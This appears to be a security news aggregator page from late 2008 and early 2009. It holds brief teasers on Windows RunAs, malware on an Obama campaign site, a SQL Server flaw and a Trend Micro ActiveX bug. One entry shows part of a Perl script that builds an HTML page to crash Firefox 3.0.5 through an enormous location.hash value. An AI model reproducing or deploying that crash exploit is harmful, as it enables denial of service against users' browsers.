Windows RunAs Password Length Vulnerability

Monday, January 26th, 2009

The 'RunAs' application included with Microsoft Windows is prone to a local information-disclosure vulnerability that may reveal information about password lengths. A local attacker may exploit this issue to gain information about user passwords. This may aid in further attacks, such as brute-force or dictionary attacks against passwords. An attacker requires local, ...

Hackers exploit Obama site to spread malware

Monday, January 26th, 2009

A social networking site operated by the 2008 Barack Obama campaign is serving up malware to unwary visitors a full week after the tactic was reported, a security researcher said today. My.BarackObama.com, still active after the inauguration last week of President Obama, is being used by hackers trying to dupe users ...

Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit

Tuesday, December 23rd, 2008

#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP
$filename = $ARGV[0];
if(!defined($filename)) {print "Usage: $0 <filename.html>\n\n";}
$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...

Microsoft confirms critical SQL Server vulnerability

Monday, December 22nd, 2008

Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line. The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...

Researchers sound alarm about bug in free antivirus scanner

Monday, December 22nd, 2008

A bug in Trend Micro's free online virus scanning service can be used by hackers to hijack Windows PCs running Internet Explorer, security researchers warned. Attackers able to dupe users into visiting a malicious Web page could exploit a vulnerability in the custom ActiveX control that Trend Micro distributes to users ...